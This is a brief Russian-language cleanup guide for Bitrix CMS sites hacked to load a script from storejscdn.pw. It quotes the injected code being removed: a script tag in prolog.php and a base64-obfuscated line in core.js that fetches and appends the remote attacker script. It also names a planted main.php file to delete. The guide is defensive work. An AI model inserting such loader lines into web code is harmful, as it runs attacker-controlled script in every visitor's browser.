Лечение storejscdn pw в Bitrix CMS

В день конституции Украины массово взломали сайты на Bitrix. Простым удалением строчки встроенного скрипта решить проблему не получится. Спустя время снова появится строка https storejscdn pw jqueryui js.

Удаляем строку storejscdn pw

из файла /bitrix/modules/main/prolog.php удаляем строку

<sсriрt src="httрs://stоrеjscdn.рw/jquеrуui.js"></script>

Изменяем core.js

Желательно обновить модуль ядра, но энтузиасты пишут что достаточно убрать строку в конце этого файла (путь /bitrix/js/main/core/core.js), которая выглядит так, либо очень похожа:

s=dосument.сrеateElement(`scriрt`);s.srс=atоb(`aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz`);dосument.head.appеndСhild(s);

Удаляем файл в компоненте main.file.input

Файл находится по следующему пути /bitrix/components/bitrix/main.file.input/main.php

Если посмотреть на других незараженных сайтах, в этом компоненте не существует файла main.php. Удаляем.